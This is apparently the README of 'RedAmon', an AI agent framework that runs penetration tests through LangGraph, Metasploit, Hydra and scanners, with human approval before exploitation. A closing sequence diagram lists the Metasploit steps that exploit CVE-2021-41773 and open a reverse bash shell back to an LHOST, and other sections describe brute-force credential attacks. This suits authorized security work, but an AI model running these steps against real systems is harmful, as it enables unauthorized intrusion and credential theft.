Skip to content

Latest commit

 

History

History
1874 lines (1471 loc) · 68 KB

File metadata and controls

1874 lines (1471 loc) · 68 KB

RedAmon Agentic System

Overview

The RedAmon Agentic System is an AI-powered penetration testing orchestrator built on LangGraph. It implements the ReAct (Reasoning and Acting) pattern to autonomously conduct security assessments while maintaining human oversight through phase-based approval workflows.


Table of Contents

  1. Architecture Overview
  2. Core Components
  3. LangGraph State Machine
  4. Attack Path Classification
  5. Tool Execution & MCP Integration
  6. WebSocket Streaming
  7. Frontend Integration
  8. Detailed Workflows
  9. Multi-Objective Support
  10. Security & Multi-Tenancy
  11. EvoGraph — Evolutive Attack Chain Graph
  12. Prompt Token Optimization
  13. Error Handling & Resilience
  14. Configuration Reference
  15. Running the System

Architecture Overview

flowchart TB
    subgraph Frontend["Frontend (Next.js Webapp)"]
        UI[AIAssistantDrawer]
        Hook[useAgentWebSocket Hook]
        Timeline[AgentTimeline]
        Dialogs[Approval/Question Dialogs]
    end

    subgraph Backend["Backend (FastAPI)"]
        WS[WebSocket API]
        REST[REST API]
        WSM[WebSocketManager]
    end

    subgraph Orchestrator["Agent Orchestrator"]
        LG[LangGraph State Machine]
        CP[MemorySaver Checkpointer]
        SC[StreamingCallback]
    end

    subgraph Tools["Tool Layer"]
        TE[PhaseAwareToolExecutor]
        MCP[MCPToolsManager]
        N4J[Neo4jToolManager]
    end

    subgraph MCPServers["MCP Servers (Docker)"]
        NETRECON[Network Recon Server :8000<br/>curl + naabu + kali_shell + execute_code]
        NUCLEI[Nuclei Server :8002]
        MSF[Metasploit Server :8003]
        NMAP[Nmap Server :8004]
    end

    subgraph Data["Data Layer"]
        NEO4J[(Neo4j Graph DB)]
        KALI[Kali Sandbox Container]
    end

    UI --> Hook
    Hook <-->|WebSocket JSON| WS
    WS --> WSM
    WSM --> LG
    LG --> CP
    LG --> SC
    SC -->|Streaming Events| WSM

    LG --> TE
    TE --> MCP
    TE --> N4J

    MCP --> NETRECON
    MCP --> NUCLEI
    MCP --> MSF
    MCP --> NMAP

    N4J --> NEO4J
    MSF --> KALI
    NETRECON --> KALI
    NUCLEI --> KALI
    NMAP --> KALI
Loading

Core Components

File Structure

File / Directory Purpose
orchestrator.py Main LangGraph agent with ReAct pattern
state.py Pydantic models and TypedDict state definitions
project_settings.py Database-driven configuration (fetches from webapp API)
tools.py MCP and Neo4j tool management
api.py REST API endpoints
websocket_api.py WebSocket streaming API
utils.py Utility functions
prompts/ System prompts package (phase-aware, attack-path-specific)
prompts/base.py Core ReAct, analysis, and report prompts
prompts/classification.py Attack path classification prompt
prompts/cve_exploit_prompts.py CVE exploitation workflow & payload guidance
prompts/brute_force_credential_guess_prompts.py Brute force / credential attack workflow
prompts/post_exploitation.py Post-exploitation prompts (statefull, stateless)
prompts/tool_registry.py Single source of truth for tool metadata (names, purposes, args, descriptions)
orchestrator_helpers/ Helper modules extracted from orchestrator
orchestrator_helpers/config.py Session config, checkpointer, thread ID management
orchestrator_helpers/phase.py Attack path classification & phase determination
orchestrator_helpers/parsing.py LLM response parsing (decisions & inline analysis)
orchestrator_helpers/json_utils.py JSON serialization with datetime support
orchestrator_helpers/chain_graph_writer.py EvoGraph persistence — attack chain nodes, bridge relationships, and cross-session queries to Neo4j
orchestrator_helpers/debug.py Graph visualization (Mermaid PNG export)

Key Classes

classDiagram
    class AgentOrchestrator {
        +llm: ChatOpenAI
        +tool_executor: PhaseAwareToolExecutor
        +graph: StateGraph
        +_guidance_queue: asyncio.Queue
        +initialize()
        +invoke(question, user_id, project_id, session_id)
        +invoke_with_streaming(question, ..., streaming_callback, guidance_queue)
        +resume_after_approval(...)
        +resume_after_answer(...)
        +resume_after_approval_with_streaming(..., guidance_queue)
        +resume_after_answer_with_streaming(..., guidance_queue)
        +resume_execution_with_streaming(..., guidance_queue)
    }

    class PhaseAwareToolExecutor {
        +mcp_manager: MCPToolsManager
        +graph_tool: Neo4jToolManager
        +phase_tools: Dict
        +execute(tool_name, tool_args, phase)
        +execute_with_progress(tool_name, tool_args, phase, progress_callback)
        +get_tools_for_phase(phase)
    }

    class MCPToolsManager {
        +servers: List[MCPServer]
        +tools_cache: Dict
        +get_tools(max_retries, retry_delay)
        +call_tool(tool_name, args)
    }

    class Neo4jToolManager {
        +driver: Neo4jDriver
        +llm: ChatOpenAI
        +query_graph(question, user_id, project_id)
    }

    class StreamingCallback {
        <<interface>>
        +on_thinking(iteration, phase, thought, reasoning)
        +on_tool_start(tool_name, tool_args)
        +on_tool_output_chunk(tool_name, chunk, is_final)
        +on_tool_complete(tool_name, success, output_summary, actionable_findings, recommended_next_steps)
        +on_phase_update(current_phase, iteration_count, attack_path_type)
        +on_approval_request(approval_request)
        +on_question_request(question_request)
        +on_response(answer, iteration_count, phase, task_complete)
        +on_execution_step(step)
        +on_error(error_message, recoverable)
        +on_task_complete(message, final_phase, total_iterations)
    }

    AgentOrchestrator --> PhaseAwareToolExecutor
    AgentOrchestrator --> StreamingCallback
    PhaseAwareToolExecutor --> MCPToolsManager
    PhaseAwareToolExecutor --> Neo4jToolManager
Loading

LangGraph State Machine

State Definition

The agent maintains comprehensive state throughout execution:

erDiagram
    AgentState {
        list messages "Conversation history"
        int current_iteration "Current loop iteration"
        int max_iterations "Maximum allowed iterations"
        string current_phase "informational|exploitation|post_exploitation"
        string attack_path_type "cve_exploit|brute_force_credential_guess"
        bool task_complete "Whether objective is achieved"
        string completion_reason "Why task ended"
        bool msf_session_reset_done "Metasploit auto-reset tracking"
        list chain_findings_memory "EvoGraph: accumulated findings"
        list chain_failures_memory "EvoGraph: accumulated failures"
        list chain_decisions_memory "EvoGraph: accumulated decisions"
    }

    AgentState ||--o{ ExecutionStep : execution_trace
    AgentState ||--o{ TodoItem : todo_list
    AgentState ||--o{ ConversationObjective : conversation_objectives
    AgentState ||--o{ ObjectiveOutcome : objective_history
    AgentState ||--o{ PhaseHistoryEntry : phase_history
    AgentState ||--o{ QAHistoryEntry : qa_history
    AgentState ||--|| TargetInfo : target_info
    AgentState ||--o| PhaseTransitionRequest : phase_transition_pending
    AgentState ||--o| UserQuestionRequest : pending_question

    ExecutionStep {
        string step_id "Unique step identifier"
        int iteration "Step number"
        string phase "Phase during step"
        string thought "LLM reasoning"
        string reasoning "Why this action"
        string tool_name "Tool executed"
        dict tool_args "Tool arguments"
        string tool_output "Raw tool output"
        bool success "Execution success"
        string output_analysis "LLM analysis of output"
    }

    TargetInfo {
        string primary_target "Main target IP/domain"
        string target_type "ip|hostname|domain|url"
        list ports "Discovered ports"
        list services "Detected services"
        list technologies "Identified technologies"
        list vulnerabilities "Found vulnerabilities"
        list credentials "Extracted credentials (brute force)"
        list sessions "Active Metasploit session IDs"
        dict session_details "Rich session metadata per ID"
    }

    TodoItem {
        string description "Task description"
        string status "pending|in_progress|completed|blocked"
        string priority "high|medium|low"
    }
Loading

Graph Structure

stateDiagram-v2
    [*] --> initialize

    initialize --> process_approval: Has approval response
    initialize --> process_answer: Has question answer
    initialize --> think: Normal flow

    think --> execute_tool: action=use_tool
    think --> await_approval: action=transition_phase (needs approval)
    think --> await_question: action=ask_user
    think --> generate_response: action=complete OR max_iterations

    execute_tool --> think: Output analyzed inline in next think

    await_approval --> [*]: Pauses for user input

    process_approval --> think: Approved or modified
    process_approval --> generate_response: Aborted

    await_question --> [*]: Pauses for user input

    process_answer --> think: Continue with answer
    process_answer --> generate_response: If task complete

    generate_response --> [*]
Loading

Node Responsibilities

flowchart LR
    subgraph Nodes["LangGraph Nodes"]
        direction TB
        INIT[initialize]
        THINK[think]
        EXEC[execute_tool]
        AWAIT_A[await_approval]
        PROC_A[process_approval]
        AWAIT_Q[await_question]
        PROC_Q[process_answer]
        GEN[generate_response]
    end

    subgraph InitDesc["Initialize Node"]
        I1[Setup state for new session]
        I2[Detect multi-objective scenarios]
        I3[Classify attack path via LLM]
        I4[Route approval/answer resumption]
        I5[Migrate legacy state]
    end

    subgraph ThinkDesc["Think Node - Single LLM Call"]
        T1[Build system prompt with dynamic tool registry]
        T2[If pending tool output: inject output analysis section]
        T3[Format execution trace with compact/full formatting]
        T4[Get LLM decision JSON with inline output_analysis]
        T5[Parse action: use_tool/transition_phase/complete/ask_user]
        T6[Process output_analysis: merge target info, detect exploits]
        T7[Update todo list]
        T8[Pre-exploitation validation: force ask_user if LHOST/LPORT missing]
        T9[Failure loop detection: inject warning after 3+ similar failures]
    end

    subgraph ExecDesc["Execute Tool Node"]
        E1[Validate tool for current phase]
        E2[Set tenant context]
        E3[Auto-reset Metasploit on first use via msf_restart]
        E4[Execute via MCP or Neo4j]
        E5[Stream progress for long-running MSF commands]
        E6[Capture output and errors]
    end

    subgraph GenDesc["Generate Response Node - LLM Call #2"]
        G1[Build final report prompt]
        G2[Summarize session findings]
        G3[Mark task complete]
    end

    INIT -.-> InitDesc
    THINK -.-> ThinkDesc
    EXEC -.-> ExecDesc
    GEN -.-> GenDesc
Loading

Attack Path Classification

When a new objective is detected, the system uses an LLM-based classifier to determine the attack path type and required phase before execution begins. This drives dynamic tool routing throughout the session.

Attack Path Types

Type Description Example Objective
cve_exploit CVE-based exploitation using known vulnerabilities "Exploit CVE-2021-41773 on 192.168.1.100"
brute_force_credential_guess Hydra brute force / credential attacks against services "Try SSH brute force on 192.168.1.100"
<term>-unclassified Fallback for techniques without a specialized workflow "Try SQL injection on the web app" → sql_injection-unclassified

Classification Flow

flowchart TB
    MSG[New user objective arrives] --> CLASSIFY[LLM classifies objective]

    CLASSIFY --> RESULT{AttackPathClassification}

    RESULT --> CVE[cve_exploit]
    RESULT --> BRUTE[brute_force_credential_guess]
    RESULT --> UNCLASS["&lt;term&gt;-unclassified"]

    CVE --> CVE_TOOLS[CVE Exploit Tools<br/>search → use → info → set → exploit]
    CVE --> CVE_PAYLOAD{Payload Mode}
    CVE_PAYLOAD --> STATEFULL_CVE[Statefull: Meterpreter/Staged payloads<br/>+ LHOST/LPORT config]
    CVE_PAYLOAD --> STATELESS_CVE[Stateless: Command/Exec payloads]

    BRUTE --> BRUTE_TOOLS[Brute Force Tools<br/>use auxiliary/scanner → set → run]
    BRUTE --> BRUTE_POST[Post-Expl: Shell session<br/>via CreateSession=true]

    UNCLASS --> UNCLASS_TOOLS[Generic Tools<br/>Use available tools based on technique]

    style CVE fill:#6b6b6b
    style BRUTE fill:#4a4a4a
    style UNCLASS fill:#8a8a8a
    style CLASSIFY fill:#5a5a5a
Loading

Classification Model

class AttackPathClassification(BaseModel):
    required_phase: Phase           # "informational" or "exploitation"
    attack_path_type: str           # "cve_exploit", "brute_force_credential_guess", or "<term>-unclassified"
    secondary_attack_path: Optional[str]  # Fallback path if primary fails (e.g., brute_force after CVE fails)
    confidence: float               # 0.0-1.0 confidence score
    reasoning: str                  # Explanation for the classification
    detected_service: Optional[str] # e.g., "ssh", "mysql" (for brute force)

The classifier runs with retry logic (exponential backoff, max 3 retries) and falls back to ("cve_exploit", "informational") on failure.

Dynamic Tool Routing

Tool availability is now database-driven via TOOL_PHASE_MAP in project settings. The prompt system uses a Tool Registry (prompts/tool_registry.py) as the single source of truth for all tool metadata. Dynamic prompt builders generate tool tables, argument references, and phase definitions at runtime — only showing tools that are actually allowed in the current phase.

Based on the classified attack path, get_phase_tools() assembles different prompt guidance:

Phase CVE Exploit Path Brute Force Path
Informational Dynamic recon tool descriptions (from registry) Dynamic recon tool descriptions (from registry)
Exploitation CVE_EXPLOIT_TOOLS + payload guidance + no-module fallback (if MSF search failed) HYDRA_BRUTE_FORCE_TOOLS + wordlist guidance
Post-Exploitation POST_EXPLOITATION_TOOLS_STATEFULL (unified for Meterpreter and shell sessions) POST_EXPLOITATION_TOOLS_STATEFULL (same unified prompt)

No-Module Fallback: When a search CVE-* command returns no results in Metasploit, the system injects a fallback workflow (NO_MODULE_FALLBACK_STATEFULL or NO_MODULE_FALLBACK_STATELESS) that guides the agent to exploit the CVE using execute_curl, execute_code, kali_shell, or execute_nuclei instead. This saves ~1,100-1,350 tokens when a module IS found.

Pre-Exploitation Validation

Before executing Metasploit commands in statefull CVE exploit mode, the system validates session configuration:

flowchart TB
    THINK[Think Node decides: use metasploit_console] --> CHECK{Statefull mode +<br/>CVE exploit path?}

    CHECK -->|No| EXEC[Execute tool normally]
    CHECK -->|Yes| VALIDATE{LHOST/LPORT<br/>configured?}

    VALIDATE -->|Yes| EXEC
    VALIDATE -->|No| QA_CHECK{Already answered<br/>in qa_history?}

    QA_CHECK -->|Yes| EXEC
    QA_CHECK -->|No| FORCE_ASK[Force ask_user action<br/>Request LHOST/LPORT from user]

    FORCE_ASK --> PAUSE([Pause for user answer])
    PAUSE --> THINK

    style FORCE_ASK fill:#6b6b6b
    style PAUSE fill:#6b6b6b
Loading

This prevents exploitation failures by ensuring reverse/bind payload parameters are available before the agent attempts to run Metasploit exploits. Hydra brute force attacks bypass this check since they use execute_hydra (stateless) and establish sessions separately via sshpass or database clients.

Credential Detection

During Hydra brute force attacks, the think node's inline output analysis automatically extracts discovered credentials:

flowchart LR
    OUTPUT[Tool output from<br/>execute_hydra] --> ANALYSIS[Think node inline analysis<br/>LLM extracts credentials]

    ANALYSIS --> FOUND{Credentials found?}
    FOUND -->|Yes| MERGE[Merge into TargetInfo.credentials]
    FOUND -->|No| SKIP[No update]

    MERGE --> TARGET[Updated target_info<br/>available in state]
Loading

Tool Execution & MCP Integration

Phase-Based Tool Access

flowchart TB
    subgraph Phases["Security Phases"]
        INFO[Informational Phase]
        EXPL[Exploitation Phase]
        POST[Post-Exploitation Phase]
    end

    subgraph InfoTools["Informational Tools"]
        QG[query_graph<br/>Neo4j queries]
        WS[web_search<br/>Tavily web search]
        CURL[execute_curl<br/>HTTP requests & vuln probing]
        NAABU[execute_naabu<br/>Port scanning]
        NMAP_T[execute_nmap<br/>Deep scanning & NSE scripts]
        NUCLEI_T[execute_nuclei<br/>CVE verification]
        KALI[kali_shell<br/>General Kali shell]
    end

    subgraph ExplTools["Exploitation Tools"]
        MSF[metasploit_console<br/>msfconsole commands]
        CODE[execute_code<br/>Code execution, no escaping]
    end

    subgraph PostTools["Post-Exploitation Tools"]
        SESS[msf_session_run<br/>Session commands]
        WAIT[msf_wait_for_session<br/>Session polling]
        LIST[msf_list_sessions<br/>List active sessions]
    end

    INFO --> InfoTools
    EXPL --> InfoTools
    EXPL --> ExplTools
    POST --> InfoTools
    POST --> ExplTools
    POST --> PostTools

    style INFO fill:#7a7a7a
    style EXPL fill:#6b6b6b
    style POST fill:#4a4a4a
Loading

MCP Tool Execution Flow

sequenceDiagram
    participant O as Orchestrator
    participant TE as ToolExecutor
    participant MCP as MCPToolsManager
    participant S as MCP Server
    participant K as Kali Container

    O->>TE: execute("naabu", {target: "192.168.1.1"}, "informational")
    TE->>TE: Validate phase allows tool (via TOOL_PHASE_MAP)
    TE->>TE: set_tenant_context(user_id, project_id)
    TE->>MCP: call_tool("naabu", args)
    MCP->>S: HTTP POST /tools/naabu
    S->>K: Execute naabu command
    K-->>S: Port scan results
    S-->>MCP: JSON response
    MCP-->>TE: Formatted output
    TE-->>O: {success: true, output: "..."}
Loading

MCP Connection Retry Logic

The MCPToolsManager.get_tools() method includes retry logic with exponential backoff to handle MCP server startup races:

Attempt 1 → fail → wait 10s → Attempt 2 → fail → wait 20s → ... → Attempt 5 → fail → continue without MCP tools

This prevents the agent from crash-looping when the Kali sandbox container takes longer to start than the agent.

Neo4j Query Flow (Text-to-Cypher)

sequenceDiagram
    participant O as Orchestrator
    participant N4J as Neo4jToolManager
    participant LLM as OpenAI LLM
    participant DB as Neo4j Database

    O->>N4J: query_graph("What ports are open on 192.168.1.1?")
    N4J->>LLM: Generate Cypher from question
    LLM-->>N4J: MATCH (i:IP {address: '192.168.1.1'})-[:HAS_PORT]->(p:Port) RETURN p
    N4J->>N4J: Inject tenant filter (user_id, project_id)
    N4J->>DB: Execute Cypher query

    alt Query Success
        DB-->>N4J: Query results
        N4J-->>O: Formatted results
    else Query Error
        DB-->>N4J: Error message
        N4J->>LLM: Retry with error context
        LLM-->>N4J: Fixed Cypher query
        N4J->>DB: Execute fixed query
        DB-->>N4J: Results
        N4J-->>O: Formatted results
    end
Loading

Metasploit Stateful Execution

flowchart TB
    subgraph MSFServer["Metasploit MCP Server"]
        PROC[Persistent msfconsole Process]
        READER[Background Output Reader Thread]
        QUEUE[Output Queue Buffer]
    end

    subgraph Commands["One Command Per Call"]
        C1["search CVE-2021-41773"]
        C2["use exploit/multi/http/..."]
        C3["info"]
        C4["show targets"]
        C5["set TARGET 0"]
        C6["show payloads"]
        C7["set PAYLOAD cmd/unix/reverse_bash"]
        C8["set RHOSTS 192.168.1.100"]
        C9["exploit"]
        C10["msf_wait_for_session()"]
    end

    C1 --> PROC
    C2 --> PROC
    C3 --> PROC
    C4 --> PROC
    C5 --> PROC
    C6 --> PROC
    C7 --> PROC
    C8 --> PROC
    C9 --> PROC

    PROC --> READER
    READER --> QUEUE
    QUEUE --> |Timing-based detection| OUTPUT[Clean Output]

    C10 --> |Separate MCP tool| POLL[Poll for sessions]
    POLL --> |sessions -l| PROC

    style PROC fill:#4a4a4a
    style C10 fill:#6b6b6b
Loading

WebSocket Streaming

Message Protocol

flowchart LR
    subgraph Client["Client → Server"]
        INIT[init<br/>{user_id, project_id, session_id}]
        QUERY[query<br/>{question}]
        APPROVAL[approval<br/>{decision, modification}]
        ANSWER[answer<br/>{answer}]
        GUIDANCE[guidance<br/>{message}]
        STOP[stop<br/>{}]
        RESUME[resume<br/>{}]
        PING[ping<br/>{}]
    end

    subgraph Server["Server → Client"]
        CONNECTED[connected]
        THINKING[thinking<br/>{iteration, phase, thought, reasoning}]
        TOOL_START[tool_start<br/>{tool_name, tool_args}]
        TOOL_CHUNK[tool_output_chunk<br/>{tool_name, chunk, is_final}]
        TOOL_COMPLETE[tool_complete<br/>{tool_name, success, output_summary,<br/>actionable_findings, recommended_next_steps}]
        PHASE_UPDATE[phase_update<br/>{current_phase, iteration_count, attack_path_type}]
        TODO_UPDATE[todo_update<br/>{todo_list}]
        APPROVAL_REQ[approval_request<br/>{from_phase, to_phase, reason, risks}]
        QUESTION_REQ[question_request<br/>{question, context, format, options}]
        RESPONSE[response<br/>{answer, task_complete}]
        EXEC_STEP[execution_step<br/>{step summary}]
        TASK_DONE[task_complete<br/>{message, final_phase}]
        GUIDANCE_ACK[guidance_ack<br/>{message, queue_position}]
        STOPPED[stopped<br/>{message, iteration, phase}]
        ERROR[error<br/>{message, recoverable}]
    end
Loading

Streaming Event Flow

The think node emits events in a specific order to maintain correct timeline rendering in the frontend. When the think node processes both a completed previous step and a new decision, events are emitted as: tool_complete (previous) -> thinking (new) -> tool_start (new).

sequenceDiagram
    participant C as Client (Browser)
    participant WS as WebSocket API
    participant O as Orchestrator
    participant CB as StreamingCallback

    C->>WS: init {user_id, project_id, session_id}
    WS-->>C: connected

    C->>WS: query {question: "Scan ports on 192.168.1.1"}
    WS->>O: invoke_with_streaming(question, callback)

    Note over O,CB: First iteration (no pending output)
    O->>CB: on_phase_update("informational", 1, "cve_exploit")
    CB-->>WS-->>C: phase_update

    O->>CB: on_thinking(1, "informational", "Need to scan...", "Port scan required")
    CB-->>WS-->>C: thinking

    O->>CB: on_tool_start("naabu", {target: "192.168.1.1"})
    CB-->>WS-->>C: tool_start

    Note over O: Tool executes...
    O->>CB: on_tool_output_chunk("naabu", "22/tcp open\n80/tcp open", true)
    CB-->>WS-->>C: tool_output_chunk

    Note over O,CB: Second iteration (pending output from naabu)
    O->>CB: on_tool_complete("naabu", true, "Found 2 open ports")
    CB-->>WS-->>C: tool_complete (previous step)

    O->>CB: on_thinking(2, "informational", "Found open ports...", "Query graph next")
    CB-->>WS-->>C: thinking (new decision)

    O->>CB: on_tool_start("query_graph", {question: "..."})
    CB-->>WS-->>C: tool_start (new tool)

    O->>CB: on_todo_update([{description: "Analyze services", status: "pending"}])
    CB-->>WS-->>C: todo_update

    Note over O: ... continues until complete ...

    O->>CB: on_response("Scan complete. Found ports 22, 80.", 3, "informational", true)
    CB-->>WS-->>C: response

    O->>CB: on_task_complete("Task completed", "informational", 3)
    CB-->>WS-->>C: task_complete
Loading

Guidance Messages

Users can send guidance messages while the agent is working (thinking or executing tools). These messages steer/correct the agent's current objective without creating new tasks.

sequenceDiagram
    participant U as User (Frontend)
    participant WS as WebSocket API
    participant Q as Connection.guidance_queue
    participant O as Orchestrator (_think_node)

    Note over O: Agent is working (think → execute → think loop)

    U->>WS: guidance {message: "Focus on port 22"}
    WS->>Q: guidance_queue.put("Focus on port 22")
    WS-->>U: guidance_ack {message, queue_position: 1}

    U->>WS: guidance {message: "Skip the web server"}
    WS->>Q: guidance_queue.put("Skip the web server")
    WS-->>U: guidance_ack {message, queue_position: 2}

    Note over O: Next think node runs...
    O->>Q: drain_guidance() → ["Focus on port 22", "Skip the web server"]
    O->>O: Inject into system prompt as<br/>## USER GUIDANCE (IMPORTANT)
    O->>O: LLM acknowledges guidance in thought
Loading

How it works:

  1. Frontend: When isLoading=true, the chat input stays enabled. Sending a message routes to sendGuidance() instead of sendQuery().
  2. WebSocket API: handle_guidance puts the message into the connection's asyncio.Queue and sends back a guidance_ack with the queue position.
  3. Orchestrator: At the start of each _think_node invocation, pending guidance messages are drained from the queue and injected into the system prompt as a numbered ## USER GUIDANCE section.
  4. LLM: The agent sees the guidance and adjusts its plan accordingly in the next decision.

Edge cases:

  • Multiple guidance messages before the next think step are all collected and injected as a numbered list
  • Guidance sent during tool execution is queued and consumed in the next think step
  • Stale guidance from previous queries is drained at the start of each new handle_query

Stop & Resume Execution

Users can stop the agent mid-execution and resume from the last LangGraph checkpoint.

sequenceDiagram
    participant U as User (Frontend)
    participant WS as WebSocket API
    participant T as asyncio.Task
    participant CP as MemorySaver Checkpoint

    Note over T: Agent task running (background asyncio.Task)

    U->>WS: stop {}
    WS->>T: task.cancel()
    T->>T: CancelledError raised
    Note over CP: State checkpointed at last node boundary
    WS->>WS: Read iteration/phase from checkpoint
    WS-->>U: stopped {message, iteration: 5, phase: "exploitation"}

    Note over U: UI shows resume button (green play icon)

    U->>WS: resume {}
    WS->>WS: Create new background task
    WS->>T: orchestrator.resume_execution_with_streaming()
    T->>CP: graph.astream({}, config) — resume from checkpoint
    Note over T: Agent continues from last node boundary

    T-->>WS-->>U: thinking, tool_start, ... (normal streaming)
Loading

How it works:

  1. Background tasks: All orchestrator invocations (handle_query, handle_approval, handle_answer) run as asyncio.create_task() background tasks, keeping the WebSocket receive loop free for guidance/stop/resume messages.
  2. Stop: Cancels the active asyncio.Task. The CancelledError is caught gracefully. LangGraph's MemorySaver has already checkpointed state at the last node boundary.
  3. Resume: Calls resume_execution_with_streaming() which re-invokes graph.astream({}, config) with empty input. The graph resumes from the checkpoint, re-entering initialize → think with the preserved state.
  4. Frontend: The stop button (red square) appears during loading. After stop, it becomes a resume button (green play). The input is disabled while stopped.

Frontend Integration

useAgentWebSocket Hook

stateDiagram-v2
    [*] --> DISCONNECTED

    DISCONNECTED --> CONNECTING: connect()

    CONNECTING --> CONNECTED: WebSocket open + init success
    CONNECTING --> FAILED: Connection error

    CONNECTED --> RECONNECTING: WebSocket close/error
    CONNECTED --> DISCONNECTED: disconnect()

    RECONNECTING --> CONNECTING: Retry attempt
    RECONNECTING --> FAILED: Max retries exceeded

    FAILED --> CONNECTING: reconnect()
Loading

UI State Management

flowchart TB
    subgraph State["AIAssistantDrawer State"]
        ITEMS[chatItems: Array]
        PHASE[currentPhase: string]
        LOADING[isLoading: boolean]
        STOPPED[isStopped: boolean]
        AWAIT_A[awaitingApproval: boolean]
        AWAIT_Q[awaitingQuestion: boolean]
        TODO[todoList: Array]
    end

    subgraph Events["WebSocket Events"]
        E_THINK[thinking]
        E_TOOL[tool_start/complete]
        E_PHASE[phase_update]
        E_TODO[todo_update]
        E_APPR[approval_request]
        E_QUES[question_request]
        E_RESP[response]
        E_GACK[guidance_ack]
        E_STOP[stopped]
    end

    subgraph UI["UI Components"]
        TIMELINE[AgentTimeline]
        DIALOG_A[ApprovalDialog]
        DIALOG_Q[QuestionDialog]
        TODO_W[TodoListWidget]
        CHAT[ChatMessages]
        STOP_BTN[Stop/Resume Button]
        GUIDANCE_INPUT[Guidance Input<br/>enabled during loading]
    end

    E_THINK --> |Add ThinkingItem| ITEMS
    E_TOOL --> |Add ToolExecutionItem| ITEMS
    E_RESP --> |Add MessageItem| ITEMS
    E_PHASE --> PHASE
    E_TODO --> TODO
    E_APPR --> AWAIT_A
    E_QUES --> AWAIT_Q
    E_STOP --> STOPPED

    ITEMS --> TIMELINE
    ITEMS --> CHAT
    AWAIT_A --> DIALOG_A
    AWAIT_Q --> DIALOG_Q
    TODO --> TODO_W
    PHASE --> |Phase badge styling| TIMELINE
    LOADING --> STOP_BTN
    STOPPED --> STOP_BTN
    LOADING --> GUIDANCE_INPUT
Loading

Input Mode Behavior

The chat input adapts based on agent state:

State Input Enabled Send Action Placeholder Extra Button
Idle Yes sendQuery() "Ask a question..." None
Loading (agent working) Yes sendGuidance() "Send guidance to the agent..." Stop (red square)
Stopped No "Agent stopped. Click resume..." Resume (green play)
Awaiting approval No "Respond to the approval request..." None
Awaiting question No "Answer the question above..." None
Disconnected No "Connecting to agent..." None

Guidance messages appear in the chat with a purple "Guidance" badge and dashed border styling to distinguish them from regular user messages.


Detailed Workflows

Complete Agent Execution Flow

flowchart TB
    START([User sends question]) --> INIT[Initialize Node]

    INIT --> CHECK_RESUME{Resuming after<br/>approval/answer?}
    CHECK_RESUME -->|Yes, approval| PROC_A[Process Approval]
    CHECK_RESUME -->|Yes, answer| PROC_Q[Process Answer]
    CHECK_RESUME -->|No| NEW_OBJ{New objective?}

    NEW_OBJ -->|Yes| CLASSIFY[LLM classifies attack path<br/>+ required phase]
    NEW_OBJ -->|No| THINK[Think Node]
    CLASSIFY --> THINK

    PROC_A --> THINK
    PROC_Q --> THINK

    THINK --> PRE_VALID{Pre-exploitation<br/>validation}
    PRE_VALID -->|Missing LHOST/LPORT| FORCE_ASK[Force ask_user]
    PRE_VALID -->|OK| DECISION{Action?}
    FORCE_ASK --> AWAIT_Q

    DECISION -->|use_tool| EXEC[Execute Tool]
    DECISION -->|transition_phase| PHASE_CHECK{Needs approval?}
    DECISION -->|ask_user| AWAIT_Q[Await Question]
    DECISION -->|complete| GEN[Generate Response]

    EXEC --> THINK_AGAIN[Think Node<br/>analyzes output inline + decides next]
    THINK_AGAIN --> ITER_CHECK{Max iterations?}
    ITER_CHECK -->|No| PRE_VALID
    ITER_CHECK -->|Yes| GEN

    PHASE_CHECK -->|Yes| AWAIT_A[Await Approval]
    PHASE_CHECK -->|No, auto-approve| UPDATE_PHASE[Update Phase]
    UPDATE_PHASE --> THINK

    AWAIT_A --> PAUSE_A([Pause - Wait for user])
    PAUSE_A --> |User responds| PROC_A

    AWAIT_Q --> PAUSE_Q([Pause - Wait for user])
    PAUSE_Q --> |User answers| PROC_Q

    GEN --> END([Return response])

    style START fill:#7a7a7a
    style END fill:#7a7a7a
    style PAUSE_A fill:#6b6b6b
    style PAUSE_Q fill:#6b6b6b
    style CLASSIFY fill:#636363
    style THINK fill:#5a5a5a
    style THINK_AGAIN fill:#5a5a5a
    style GEN fill:#5a5a5a
Loading

Phase Transition Approval Flow

sequenceDiagram
    participant A as Agent (Think Node)
    participant O as Orchestrator
    participant WS as WebSocket
    participant U as User (Frontend)

    A->>O: Decision: transition_phase to "exploitation"
    O->>O: Check REQUIRE_APPROVAL_FOR_EXPLOITATION

    alt Approval Required
        O->>O: Store phase_transition_pending
        O->>O: Set awaiting_user_approval = true
        O->>WS: Send approval_request message
        WS->>U: Display approval dialog

        Note over O,U: Graph pauses at await_approval node (END)

        U->>WS: User decision (approve/modify/abort)
        WS->>O: Resume with user_approval_response

        alt User Approved
            O->>O: Update current_phase = "exploitation"
            O->>O: Add to phase_history
            O->>O: Clear approval state
            O->>A: Continue in new phase
        else User Modified
            O->>O: Add modification to messages
            O->>O: Clear approval state
            O->>A: Continue with modification context
        else User Aborted
            O->>O: Set task_complete = true
            O->>O: Generate final response
        end
    else Auto-Approve (downgrade to informational)
        O->>O: Update current_phase immediately
        O->>A: Continue in new phase
    end
Loading

Exploitation Workflow: CVE Exploit Path

sequenceDiagram
    participant U as User
    participant A as Agent
    participant MSF as Metasploit Server
    participant T as Target

    U->>A: "Exploit CVE-2021-41773 on 192.168.1.100"

    Note over A: Initialize: LLM classifies → cve_exploit
    Note over A: Phase: Informational
    A->>A: Query graph for target info
    A->>A: Request phase transition to exploitation

    U->>A: Approve transition

    Note over A: Phase: Exploitation (cve_exploit path)
    Note over A: Pre-exploitation: validate LHOST/LPORT

    A->>MSF: search CVE-2021-41773
    MSF-->>A: exploit/multi/http/apache_normalize_path_rce

    A->>MSF: use exploit/multi/http/apache_normalize_path_rce
    MSF-->>A: Module loaded

    A->>MSF: info
    MSF-->>A: Module options and description

    A->>MSF: show targets
    MSF-->>A: 0: Unix Command, 1: Linux Dropper

    A->>MSF: set TARGET 0
    MSF-->>A: TARGET => 0

    A->>MSF: show payloads
    MSF-->>A: Compatible payloads list

    A->>MSF: set PAYLOAD cmd/unix/reverse_bash
    MSF-->>A: PAYLOAD => cmd/unix/reverse_bash

    A->>MSF: set RHOSTS 192.168.1.100
    MSF-->>A: RHOSTS => 192.168.1.100

    A->>MSF: set LHOST 192.168.1.50
    MSF-->>A: LHOST => 192.168.1.50

    A->>MSF: exploit
    MSF->>T: Send exploit payload
    T-->>MSF: Reverse shell connects
    MSF-->>A: "Sending stage..." (streamed via progress chunks)

    Note over A: Session detected via inline output analysis
    A->>MSF: msf_wait_for_session(timeout=120)
    MSF-->>A: Session 1 opened

    A->>A: Request phase transition to post_exploitation
